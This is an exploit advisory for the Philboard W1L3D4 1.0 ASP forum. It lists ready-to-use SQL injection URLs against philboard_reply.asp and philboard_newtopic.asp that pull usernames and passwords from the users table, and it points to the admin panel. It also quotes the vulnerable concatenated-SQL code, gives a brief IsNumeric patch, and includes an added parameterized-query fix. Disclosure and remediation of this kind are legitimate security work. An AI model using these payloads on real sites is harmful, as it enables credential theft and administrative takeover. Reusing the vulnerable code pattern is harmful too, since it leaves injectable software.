
# Title : W1L3D4 Philboard 1.0 (philboard_reply.asp) SQL Injection Vulnerability
# Published : 2008-04-20
# Author : U238


Philboard W1L3D4 v1.0 Multiple SQL Injection Vulnerabilities

Author : U238 

mail   : setuid.noexec0x1[aq]hotmail[dot]com

webpage: http://noexec.blogspot.com


Script : http://www.aspindir.com/Goster/4703

Script2: http://rapidshare.de/files/39107179/philboardtrge.zip.html

-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_


[0x1] Exploit:

http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users

http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users

*
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users

http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2,3,4,5,6+from+users



-----------------------


http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,password,2,3,4,5+from+users

http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,username,2,3,4,5+from+users


-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_-

[0x2] Admin Panel


target/philboard/philboard_admin.asp





[0x3] Vulnerable Files :

philboard_newtopic.asp

philboard_reply.asp


[0x3] Vulnerable Code :


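' id comes straight from the query string, with no validation
id = Request.QueryString("id")

recordnum = Request.QueryString("recordnum")

' id is concatenated into the SQL text, so its value is parsed as part of the query
sql = "SELECT replies.*, forums.*, topics.locked FROM (forums INNER JOIN topics ON forums.forumid = topics.forum) INNER JOIN replies ON topics.id = replies.root WHERE replies.id = " & id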




                                     [-] Patched ? [-] 

id = Request.QueryString("id")
IF Not IsNumeric(request.querystring("id")) THEN
Response.write "sql injection mu arıyon yawrucum,anam? !!" 
Response.End
END IF

* Add this check to each of the vulnerable files listed above.
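
A stricter form of the check above, as an added example (not from the original advisory and not Philboard's own code): the id is validated as a plain integer and bound as a query parameter instead of being concatenated. The connection object conn and the helper RequireLong are assumed names; the same pattern applies to the topic and forumid parameters shown in [0x1].

```vbscript
<%
' Added example. Assumes an already-open ADODB.Connection named conn
' (hypothetical name; the advisory does not show the connection setup).
Const adCmdText = 1
Const adParamInput = 1
Const adInteger = 3

' Return the named query-string value as a Long, or end the request with HTTP 400.
Function RequireLong(name)
    Dim raw, re
    raw = Trim(Request.QueryString(name))
    ' Digits only: IsNumeric also accepts forms such as "1e3" or "&H10".
    ' At most 9 digits, so CLng cannot overflow.
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    If Not re.Test(raw) Then
        Response.Status = "400 Bad Request"
        Response.End
    End If
    RequireLong = CLng(raw)
End Function

Dim id, cmd, rs
id = RequireLong("id")

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' Same SELECT as the vulnerable code, with a ? placeholder instead of "& id".
cmd.CommandText = "SELECT replies.*, forums.*, topics.locked " & _
    "FROM (forums INNER JOIN topics ON forums.forumid = topics.forum) " & _
    "INNER JOIN replies ON topics.id = replies.root WHERE replies.id = ?"
' The value is sent as a typed integer parameter, never as SQL text.
cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , id)
Set rs = cmd.Execute
%>
```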




------------------------------
[0x4] Greatz: The_BekiR - ka0x - Ferruh Mavituna - fahn - sersak

[0x5] U238 | Web - Designer Developer Solutions

-----------------------------
